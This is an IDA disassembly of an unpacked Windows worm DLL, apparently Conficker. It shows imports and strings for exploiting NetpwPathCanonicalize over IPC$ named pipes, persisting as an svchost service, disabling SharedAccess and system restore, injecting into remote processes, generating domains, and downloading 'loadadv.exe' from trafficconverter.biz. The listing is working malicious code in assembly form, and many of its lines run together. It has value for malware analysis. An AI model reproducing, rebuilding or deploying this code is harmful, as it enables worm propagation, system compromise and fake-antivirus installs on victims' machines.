;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 45603A001C922DCEF815B225F86556FF
; File Name : u:\work\45603a001c922dcef815b225f86556ff_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 9A0000
; Section 1. (virtual address 00001000)
; Virtual size : 00019000 ( 102400.)
; Section size in file : 00019000 ( 102400.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; OS type : MS Windows
; Application type: DLL 32bit
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 9A1000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dword_9A1000 dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandledword_9A1004 dd 77DD7535h ; resolved to->ADVAPI32.RegCreateKeyExW ; sub_9A9099+183�r
dword_9A1008 dd 77DD6A78h ; resolved to->ADVAPI32.RegOpenKeyExWdword_9A100C dd 77DD6FC8h ; resolved to->ADVAPI32.RegQueryValueExWdword_9A1010 dd 77DDD7CCh ; resolved to->ADVAPI32.RegSetValueExW ; sub_9A9099+D8�r
dword_9A1014 dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerAdword_9A1018 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceAdword_9A101C dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_9A7D25+54�r ...
dword_9A1020 dd 77DEB635h ; resolved to->ADVAPI32.ControlServicedword_9A1024 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_9A1028 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_9A7D25+1D�r
dword_9A102C dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA dd 0
dword_9A1034 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_9A9312+E1�r
dword_9A1038 dd 7C80A05Dh ; resolved to->KERNEL32.WaitForMultipleObjectsdword_9A103C dd 7C81CE03h ; resolved to->KERNEL32.TerminateThreaddword_9A1040 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_9A986A+1C�r ...
dword_9A1044 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_9A1048 dd 7C8608FFh ; resolved to->KERNEL32.GetTempFileNameA ; sub_9AC843+58�r
dword_9A104C dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; sub_9AC843+6C�r
dword_9A1050 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_9A1054 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChardword_9A1058 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_9A105C dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_9A1060 dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_9A8A08+4CB�r
dword_9A1064 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchange ; sub_9A97BF+43�r ...
dword_9A1068 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_9A8A08+AC�r ...
dword_9A106C dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_9ABD83+30A�r
dword_9A1070 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_9A88D6+120�r
dword_9A1074 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_9A870B+28�r ...
dword_9A1078 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_9AC53D+5D�r ...
dword_9A107C dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_9A1080 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeapdword_9A1084 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeap ; sub_9A8105+6�r
dword_9A1088 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeapdword_9A108C dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_9A1090 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_9A1094 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_9A1098 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_9A109C dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounterdword_9A10A0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_9A10A4 dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationAdword_9A10A8 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_9A10AC dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_9A10B0 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_9A10B4 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_9A10B8 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_9A10BC dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFree ; sub_9A728D+89�r ...
dword_9A10C0 dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAlloc ; sub_9A7364+56�r ...
dword_9A10C4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_9A7CA0+17�r ...
dword_9A10C8 dd 7C832361h ; resolved to->KERNEL32.LockFiledword_9A10CC dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_9A8119+2D�r
dword_9A10D0 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_9A8054+2A�r ...
dword_9A10D4 dd 7C85D4C3h ; resolved to->KERNEL32.MoveFileExA ; sub_9A6A3A+EF�r
dword_9A10D8 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_9A10DC dd 7C835E8Fh ; resolved to->KERNEL32.MoveFileAdword_9A10E0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_9A7D84+1C�r ...
dword_9A10E4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_9A10E8 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_9A7B75+96�r ...
dword_9A10EC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_9A870B+71�r ...
dword_9A10F0 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_9A88D6+C0�r ...
dword_9A10F4 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_9A10F8 dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameA ; sub_9A6DB9+48�r
dword_9A10FC dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_9A8054+24�r ...
dword_9A1100 dd 7C811296h ; resolved to->KERNEL32.DisableThreadLibraryCallsdword_9A1104 dd 7C801AD0h ; resolved to->KERNEL32.VirtualProtectdword_9A1108 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_9A110C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_9A1110 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_9A7B75+56�r ...
dword_9A1114 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_9A8F2C+11�r
dword_9A1118 dd 7C81042Ch ; resolved to->KERNEL32.CreateRemoteThreaddword_9A111C dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_9A1120 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_9A8054+1D�r ...
align 8
dword_9A1128 dd 71B2517Fh dword_9A112C dd 71B2547Ah dd 0
dword_9A1134 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_9A1138 dd 77C39D67h ; resolved to->MSVCRT._inittermdword_9A113C dd 77C2C0C3h ; resolved to->MSVCRT.calloc ; sub_9B2C56+31�r ...
dword_9A1140 dd 77C41B72h ; resolved to->MSVCRT.sscanf ; sub_9B2909+125�r ...
dword_9A1144 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_9B2081+B1�r
dword_9A1148 dd 77C2C437h ; resolved to->MSVCRT.realloc ; sub_9B15F5+1B2�r
dword_9A114C dd 77C3EA08h ; resolved to->MSVCRT._fdopendword_9A1150 dd 77C40E13h ; resolved to->MSVCRT.fprintfdword_9A1154 dd 77C41574h ; resolved to->MSVCRT.ftelldword_9A1158 dd 77C46030h ; resolved to->MSVCRT.strcpydword_9A115C dd 77C4624Eh ; resolved to->MSVCRT._stricmp ; sub_9A6EE2+9A�r ...
dword_9A1160 dd 77C1F2BCh ; resolved to->MSVCRT._errno ; sub_9AF43F:loc_9AF45C�r ...
dword_9A1164 dd 77C4139Ch ; resolved to->MSVCRT.fseek ; sub_9ACA2E+56�r ...
dword_9A1168 dd 77C411FBh ; resolved to->MSVCRT.fread ; sub_9ACBC3+4B�r ...
dword_9A116C dd 77C47730h ; resolved to->MSVCRT.strcmpdword_9A1170 dd 77C3F010h ; resolved to->MSVCRT.fopen ; sub_9ACCC3+57�r ...
dword_9A1174 dd 77C40AB1h ; resolved to->MSVCRT.fclose ; sub_9ACE59+10�r ...
dword_9A1178 dd 77C4173Bh ; resolved to->MSVCRT.fwritedword_9A117C dd 77C46EB0h ; resolved to->MSVCRT.memcmpdword_9A1180 dd 77C46040h ; resolved to->MSVCRT.strcatdword_9A1184 dd 77C4D444h ; resolved to->MSVCRT.sindword_9A1188 dd 77C4CEE0h ; resolved to->MSVCRT.logdword_9A118C dd 77C47CE5h ; resolved to->MSVCRT.strtokdword_9A1190 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_9A1194 dd 77C464BFh ; resolved to->MSVCRT._strnicmpdword_9A1198 dd 77C47E94h ; resolved to->MSVCRT.wcscpy ; sub_9A9099+9E�r
dword_9A119C dd 77C47E61h ; resolved to->MSVCRT.wcscat ; sub_9A9099+A8�r
dword_9A11A0 dd 77C3EC4Bh ; resolved to->MSVCRT._fileno ; sub_9ACCC3+DF�r
dword_9A11A4 dd 77C2DAB4h ; resolved to->MSVCRT._fstat ; sub_9ACCC3+E7�r
dword_9A11A8 dd 77C371BCh ; resolved to->MSVCRT.srand ; sub_9AC0EF+2A�r ...
dword_9A11AC dd 77C48180h ; resolved to->MSVCRT.wcsstrdword_9A11B0 dd 77C47FCCh ; resolved to->MSVCRT.wcslen ; sub_9A8F81+7B�r ...
dword_9A11B4 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_9A11B8 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_9A11BC dd 77C2C407h ; resolved to->MSVCRT.malloc ; sub_9ACA2E+8B�r ...
dword_9A11C0 dd 77C46320h ; resolved to->MSVCRT._strlwr ; sub_9ABADB+182�r ...
dword_9A11C4 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_9ABADB+190�r ...
dword_9A11C8 dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_9A11CC dd 77C46125h ; resolved to->MSVCRT._strdup ; sub_9A9818+2A�r
dword_9A11D0 dd 77C2C21Bh ; resolved to->MSVCRT.free ; sub_9A7356+4�r ...
dword_9A11D4 dd 77C3FA76h ; resolved to->MSVCRT._snprintf ; sub_9A6DB9+7D�r ...
dword_9A11D8 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_9A7077:loc_9A717E�r ...
dword_9A11DC dd 77C47920h ; resolved to->MSVCRT.strncatdword_9A11E0 dd 77C47A90h ; resolved to->MSVCRT.strncpy ; sub_9ACCC3+49�r ...
dword_9A11E4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_9A11E8 dd 77C36BD0h ; resolved to->MSVCRT.labsdword_9A11EC dd 77C461C8h ; resolved to->MSVCRT._memicmp ; sub_9B1F83+74�r
dd 0
dword_9A11F4 dd 77124C05h dword_9A11F8 dd 77124C7Eh dword_9A11FC dd 77124880h dd 0
dword_9A1204 dd 77EF34D0h dword_9A1208 dd 77E9A8ACh ; sub_9A754B+28�r
dword_9A120C dd 77E9A860h ; sub_9A754B+3A�r
dword_9A1210 dd 77E7B3ABh ; sub_9A754B+AD�r
align 8
dword_9A1218 dd 7E41C243h ; resolved to->USER32.GetKeyboardLayoutList align 10h
dword_9A1220 dd 77C018BAh dword_9A1224 dd 77C01A50h dword_9A1228 dd 77C019FFh align 10h
dword_9A1230 dd 7806C865h ; sub_9A9460+4B�r
dword_9A1234 dd 78060C6Dh ; sub_9A9460+71�r
dword_9A1238 dd 7806ABB4h dword_9A123C dd 7805DA59h ; sub_9A8471+136�r ...
dword_9A1240 dd 780767C6h ; sub_9A728D+24�r ...
dword_9A1244 dd 78070BCAh ; sub_9A9460+64�r
dd 0
dword_9A124C dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_9A82E1+50�r ...
dword_9A1250 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_9A1254 dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_9A8385+3E�r
dword_9A1258 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_9B21B5+63�r
dword_9A125C dd 71AB3EA1h ; resolved to->WS2_32.setsockoptdword_9A1260 dd 71AB2C69h ; resolved to->WS2_32.sendtodword_9A1264 dd 71AB88D3h ; resolved to->WS2_32.listendword_9A1268 dd 71AC1028h ; resolved to->WS2_32.acceptdword_9A126C dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_9B25D9+D7�r
dword_9A1270 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_9B15F5+F8�r ...
dword_9A1274 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; sub_9B15F5+9C�r
dword_9A1278 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_9ABD83+34A�r
dword_9A127C dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_9B15F5+14�r
dword_9A1280 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_9A1284 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_9ABADB+29A�r ...
dword_9A1288 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_9A9818+19�r ...
dword_9A128C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_9A1290 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_9A1294 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_9AC0EF+99�r ...
dword_9A1298 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_9B15F5+7D�r ...
dword_9A129C dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_9A12A0 dd 71AB2A5Eh ; resolved to->WS2_32.WSASetLastError ; sub_9A82E1+9C�r ...
dword_9A12A4 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_9B34BA�r
dword_9A12A8 dd 71AB4489h ; resolved to->WS2_32.WSAIoctldword_9A12AC dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_9ABADB+23�r ...
dword_9A12B0 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_9B234F+15C�r ...
align 8
dword_9A12B8 dd 774FEE36h dword_9A12BC dd 774FFAC3h ; sub_9A6C5C+5A�r
dword_9A12C0 dd 774FEF6Bh align 8
dword_9A12C8 dd 78161DFDh dword_9A12CC dd 781B78E3h dd 2 dup(0)
dword_9A12D8 dd 6C6C642Eh, 0 ; sub_9A6847+8A�o
dword_9A12E0 dd 5Ch dword_9A12E4 dd 626F6C47h, 255C6C61h, 75252D75h, 0dword_9A12F4 dd 304CE942h, 40D86E39h, 13B93A94h, 0D49C0CC4hdword_9A1304 dd 0F7898AF5h, 4632CAC4h, 6DAECA2h, 0F21A11E5h dd 0CA545C6h, 4A6C37ADh, 769F92BFh, 0F57E0610h ; DATA XREF: sub_9A6C5C+55�o
dword_9A1324 dd 0E0483BA0h, 4D9C47FFh, 4177D6A6h, 0F795B1D0haWww: ; DATA XREF: sub_9A6D4E+34�o
unicode 0, <WWW>,0
a08x08x db '%08x%08x',0 ; DATA XREF: sub_9A6DB9+76�o
align 4
stru_9A1348 _msEH <0FFFFFFFFh, offset loc_9A6ECE, offset loc_9A6ED2>
; DATA XREF: sub_9A6E48+2�o
dword_9A1354 dd 504354h ; sub_9A7077+90�o
dd 6425h, 0 ; DATA XREF: sub_9A6EE2+1C�o
; sub_9B2909+11F�o ...
stru_9A1360 _msEH <0FFFFFFFFh, offset loc_9A6FC1, offset loc_9A6FC5>
; DATA XREF: sub_9A6EE2+5�o
align 10h
stru_9A1370 _msEH <0FFFFFFFFh, offset loc_9A7063, offset loc_9A7067>
; DATA XREF: sub_9A6FD2+5�o
dword_9A137C dd 7525h ; sub_9A7077+A3�o ...
_msEH <0FFFFFFFFh, offset loc_9A71A6, offset loc_9A71AA>
; DATA XREF: sub_9A7077+5�o
aHttpWww_getmyi db 'http://www.getmyip.org',0 ; DATA XREF: .text:009B5018�o
align 4
aHttpGetmyip_co db 'http://getmyip.co.uk',0 ; DATA XREF: .text:009B5014�o
align 4
aHttpCheckip_dy db 'http://checkip.dyndns.org',0 ; DATA XREF: .text:off_9B5010�o
align 4
aIpAddress db 'ip address',0 ; DATA XREF: sub_9A71BA+50�o
align 8
stru_9A13E8 _msEH <0FFFFFFFFh, offset loc_9A7279, offset loc_9A727D>
; DATA XREF: sub_9A71BA+2�o
align 8
stru_9A13F8 _msEH <0FFFFFFFFh, offset loc_9A732C, offset loc_9A7330>
; DATA XREF: sub_9A728D+2�o
align 8
dword_9A1408 dd 0FFFFFFE8h, 8D5EC1FFh, 3180104Eh, 816641C4h, 75504539h
; DATA XREF: sub_9A7364+71�o
dd 59026AF5h, 2E418B64h, 8B0C408Bh, 8B1C40h, 8D08588Bh
dd 9CB6h, 29E800h, 0E2500000h, 56FC8BF8h, 839317FFh, 18E807C6h
dd 33000000h, 8B5252D2h, 1C766CCh, 0FF512E78h, 52520477h
dd 0FF525651h, 0ADE0FF37h, 8B955651h, 4C8B3C4Bh, 0CB03780Bh
dd 148DF633h, 205103B3h, 0D303128Bh, 0C0C1C033h, 42023207h
dd 75003A80h, 74C53BF5h, 713B4606h, 8BDF7218h, 0D3032451h
dd 7214B70Fh, 31C418Bh, 90048BC3h, 595EC303h, 8AA260C3h
dd 0AC802676h, 6C7275C8h, 6E6F6Dh, 0D95D2399h
aHttpD_D_D_DDS db 'http://%d.%d.%d.%d:%d/%s',0 ; DATA XREF: sub_9A7364+2A�o
; sub_9AC384+3B�o
byte_9A14D5 db 3 dup(0) ; DATA XREF: sub_9A7454+37�o
; sub_9B2B1F+9F�o
aSIpc db '\\%s\IPC$',0 ; DATA XREF: sub_9A7454+12�o
; sub_9A78CC+A3�o
align 4
aAaa: ; DATA XREF: sub_9A74B7+55�o
unicode 0, <AAA>,0
aS db 'S',0 ; DATA XREF: sub_9A74B7+50�o
aVivivivi db 'VVVV',0
align 4
aM db 'M',0 ; DATA XREF: sub_9A74B7+4B�o
aVivi db 'VV',0
align 10h
aNcacn_np db 'ncacn_np',0 ; DATA XREF: sub_9A74B7+1F�o
; sub_9A754B+22�o
align 10h
stru_9A1510 _msEH <0FFFFFFFFh, offset loc_9A7522, offset loc_9A7530>
; DATA XREF: sub_9A74B7+2�o
dword_9A151C dd 7069705Ch, 72735C65h, 63767376h, 0aHhdhh: ; DATA XREF: sub_9A754B+7D�o
unicode 0, <HHDHH>,0
asc_9A1538: ; DATA XREF: sub_9A754B+69�o
; sub_9A7607+B7�o
unicode 0, <\>,0
align 10h
stru_9A1540 _msEH <0FFFFFFFFh, offset loc_9A75DE, offset loc_9A75EC>
; DATA XREF: sub_9A754B+5�o
dword_9A154C dd 7069705Ch, 72625C65h, 6573776Fh, 72hdword_9A155C dd 0B6244A92h, 37F50397h, 0a____: ; DATA XREF: sub_9A7607+10D�o
unicode 0, <\..\..\>,0
aD_D_D_D db '\\%d.%d.%d.%d',0 ; DATA XREF: sub_9A7607+21�o
align 4
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_9A78CC+2C�o
; sub_9AC747+4C�o
align 8
stru_9A1598 _msEH <0FFFFFFFFh, offset loc_9A7A7C, offset loc_9A7A80>
; DATA XREF: sub_9A799A+2�o
a__: ; DATA XREF: sub_9A7A90+1E�o
unicode 0, <\..\>,0
align 10h
stru_9A15B0 _msEH <0FFFFFFFFh, offset loc_9A7AE2, offset loc_9A7AE6>
; DATA XREF: sub_9A7A90+2�o
aNetpwpathcanon db 'NetpwPathCanonicalize',0 ; DATA XREF: sub_9A7B0B+13�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_9A7B0B+1�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_9A7B75+4A�o
; sub_9A8054+18�o
align 4
aLoadlibrarya db 'LoadLibraryA',0 ; DATA XREF: sub_9A7B75+45�o
align 4
aServices_exe db 'services.exe',0 ; DATA XREF: sub_9A7CA0:loc_9A7CA3�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Nls',0
; DATA XREF: sub_9A7CD4+11�o
; sub_9A7D25+13�o
word_9A1642 dw 0 ; DATA XREF: sub_9A7CD4+2E�o
; sub_9A7D25+3C�o
aSharedaccess db 'SharedAccess',0 ; DATA XREF: sub_9A7F99+21�o
align 4
aN08x08x08x db 'n%08x%08x%08x',0 ; DATA XREF: sub_9A88D6+98�o
align 4
aW08x08x08x db 'w%08x%08x%08x',0 ; DATA XREF: sub_9A8A08+304�o
; sub_9A8A08+4A7�o
align 4
aL08x08x08x db 'l%08x%08x%08x',0 ; DATA XREF: sub_9A8A08+90�o
; sub_9A8A08+427�o
align 4
aResetsr db 'ResetSR',0 ; DATA XREF: sub_9A8F2C+22�o
aSrclient_dll db 'srclient.dll',0 ; DATA XREF: sub_9A8F2C+C�o
align 10h
stru_9A16A0 _msEH <0FFFFFFFFh, offset loc_9A8F67, offset loc_9A8F6B>
; DATA XREF: sub_9A8F2C+2�o
align 10h
aSoftwareMicr_0: ; DATA XREF: sub_9A8F81+F�o
unicode 0, <SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost>,0
align 4
aServicedll: ; DATA XREF: sub_9A9099+19E�o
unicode 0, <ServiceDll>,0
align 4
aParameters: ; DATA XREF: sub_9A9099+17B�o
unicode 0, <Parameters>,0
align 4
aObjectname: ; DATA XREF: sub_9A9099+163�o
unicode 0, <ObjectName>,0
align 4
aLocalsystem: ; DATA XREF: sub_9A9099+15B�o
unicode 0, <LocalSystem>,0
aImagepath: ; DATA XREF: sub_9A9099+14F�o
unicode 0, <ImagePath>,0
aErrorcontrol: ; DATA XREF: sub_9A9099+131�o
unicode 0, <ErrorControl>,0
align 4
aStart: ; DATA XREF: sub_9A9099+117�o
unicode 0, <Start>,0
aType: ; DATA XREF: sub_9A9099+FD�o
unicode 0, <Type>,0
align 4
aDisplayname: ; DATA XREF: sub_9A9099+EA�o
unicode 0, <DisplayName>,0
align 10h
aSystemCurrentc: ; DATA XREF: sub_9A9099+60�o
unicode 0, <SYSTEM\CurrentControlSet\Services\>,0
align 4
aSystemrootSyst: ; DATA XREF: sub_9A9099+1C�o
unicode 0, <%SystemRoot%\system32\svchost.exe -k >,0
dword_9A1874 dd 0 aNetsvcs: ; DATA XREF: sub_9A927B+64�o
unicode 0, <netsvcs>,0
a_biz db '.biz',0 ; DATA XREF: .text:009B53B8�o
align 10h
a_info db '.info',0 ; DATA XREF: .text:009B53B4�o
align 4
a_org db '.org',0 ; DATA XREF: .text:009B53B0�o
align 10h
a_net db '.net',0 ; DATA XREF: .text:009B53AC�o
align 4
a_com db '.com',0 ; DATA XREF: .text:009B53A8�o
align 10h
aDec db 'Dec',0 ; DATA XREF: .text:009B53A4�o
aNov db 'Nov',0 ; DATA XREF: .text:009B53A0�o
aOct db 'Oct',0 ; DATA XREF: .text:009B539C�o
aSep db 'Sep',0 ; DATA XREF: .text:009B5398�o
aAug db 'Aug',0 ; DATA XREF: .text:009B5394�o
aJul db 'Jul',0 ; DATA XREF: .text:009B5390�o
aJun db 'Jun',0 ; DATA XREF: .text:009B538C�o
aMay db 'May',0 ; DATA XREF: .text:009B5388�o
aApr db 'Apr',0 ; DATA XREF: .text:009B5384�o
aMar db 'Mar',0 ; DATA XREF: .text:009B5380�o
aFeb db 'Feb',0 ; DATA XREF: .text:009B537C�o
aJan db 'Jan',0 ; DATA XREF: .text:009B5378�o
aW3_org db 'w3.org',0 ; DATA XREF: .text:009B5374�o
align 4
aAsk_com db 'ask.com',0 ; DATA XREF: .text:009B5370�o
aMsn_com db 'msn.com',0 ; DATA XREF: .text:009B536C�o
aYahoo_com db 'yahoo.com',0 ; DATA XREF: .text:009B5368�o
align 4
aGoogle_com db 'google.com',0 ; DATA XREF: .text:009B5364�o
align 10h
aBaidu_com db 'baidu.com',0 ; DATA XREF: .text:off_9B5360�o
align 4
a0: ; DATA XREF: sub_9A9312+70�o
; sub_9AC843+4B�o ...
unicode 0, <0>,0
asc_9A1920 db ', ',0 ; DATA XREF: sub_9A953B+36�o
align 4
aHttpWww_S db 'http://www.%s',0 ; DATA XREF: sub_9A961F+2C�o
align 8
dbl_9A1938 dq 7.37565675e-1 ; DATA XREF: sub_9A96EE+A6�r
aHttpSSearch?qD db 'http://%s/search?q=%d&aq=%d',0 ; DATA XREF: sub_9A97BF+17�o
aHttpTrafficc_0 db 'http://trafficconverter.biz/4vir/antispyware/loadadv.exe',0
; DATA XREF: sub_9A986A+50�o
align 4
aHttpTrafficcon db 'http://trafficconverter.biz',0 ; DATA XREF: sub_9A986A:loc_9A98AB�o
dword_9A19B4 dd 0 aA db '',0 ; DATA XREF: sub_9ABA09+32�o
align 10h
aB db '',0 ; DATA XREF: sub_9ABADB+5D�o
dw 4400h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
dword_9A1A0C dd 2F000000h, 424D53FFh, 72h, 4 dup(0) dd 25C0000h, 0
dd 2000C00h, 4C20544Eh, 2E30204Dh, 3231h
dword_9A1A40 dd 49000000h, 424D53FFh, 73h, 4 dup(0) dd 25C0000h, 0
dd 0FF0Dh, 2FFFF00h, 25C00h, 2 dup(0)
dd 1000000h, 0B000000h, 4E000000h, 414C0054h, 4E414D4Eh
dd 0
aUnix db 'unix',0 ; DATA XREF: sub_9ABADB:loc_9ABD2A�o
align 4
aWindows4_0 db 'windows 4.0',0 ; DATA XREF: sub_9ABADB:loc_9ABD17�o
aWindows5_0 db 'windows 5.0',0 ; DATA XREF: sub_9ABADB:loc_9ABD05�o
aWindows5_1 db 'windows 5.1',0 ; DATA XREF: sub_9ABADB:loc_9ABCF3�o
aServicePack2 db 'service pack 2',0 ; DATA XREF: sub_9ABADB:loc_9ABCC9�o
align 4
aWindowsServer2 db 'windows server 2003',0 ; DATA XREF: sub_9ABADB:loc_9ABCA9�o
aServicePack db 'service pack',0 ; DATA XREF: sub_9ABADB:loc_9ABC8E�o
; sub_9ABADB:loc_9ABCDB�o
align 10h
aServicePack1 db 'service pack 1',0 ; DATA XREF: sub_9ABADB+19E�o
; sub_9ABADB+1DC�o
align 10h
aVista db 'vista',0 ; DATA XREF: sub_9ABADB+188�o
align 4
stru_9A1B08 _msEH <0FFFFFFFFh, offset loc_9ABD44, offset loc_9ABD48>
; DATA XREF: sub_9ABADB+2�o
align 8
aHttp1_0200OkPr db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_9ABD83+20B�o
db 'Pragma: no-cache',0Dh,0Ah
db 'Content-Length: %u',0Dh,0Ah
db 'Content-Type: image/jpeg',0Dh,0Ah
db 0Dh,0Ah,0
aWindowsNt5_ db 'windows nt 5.',0 ; DATA XREF: sub_9ABD83+190�o
align 4
asc_9A1B7C db 0Dh,0Ah,0 ; DATA XREF: sub_9ABD83+179�o
align 10h
aUserAgent db 0Dh,0Ah ; DATA XREF: sub_9ABD83+166�o
db 'user-agent:',0
align 10h
asc_9A1B90 db 0Dh,0Ah ; DATA XREF: sub_9ABD83+152�o
db 0Dh,0Ah,0
align 4
aGetSHttp db 'get /%s http/',0 ; DATA XREF: sub_9ABD83+70�o
align 4
stru_9A1BA8 _msEH <0FFFFFFFFh, offset loc_9AC0AE, offset loc_9AC0B2>
; DATA XREF: sub_9ABD83+5�o
align 8
dword_9A1BB8 dd 44h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 3, 8A885D04h
; DATA XREF: .text:off_9A3988�o
dd 11C91CEBh, 8E89Fh, 6048102Bh, 2, 7 dup(0)
dd 48320000h, 0
dd 180000h, 400024h, 7080647h, 30003h, 0B0000h, 20000h
dd 4011Bh, 4800D6h, 80008h, 0C2150h, 1A0008h, 0E80010h
dd 140070h, 48320008h, 0
dd 140001h, 80008h, 3080547h, 1, 0B0000h, 20000h, 4010Bh
dd 4800EEh, 80008h, 0C2113h, 7000F4h, 80010h, 4832h, 20000h
dd 80010h, 4460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 700008h, 8000Ch, 4832h
dd 30000h, 24001Ch, 7470040h, 30708h, 3, 0Bh, 0B0002h
dd 20004h, 8011Bh, 48019Ch, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
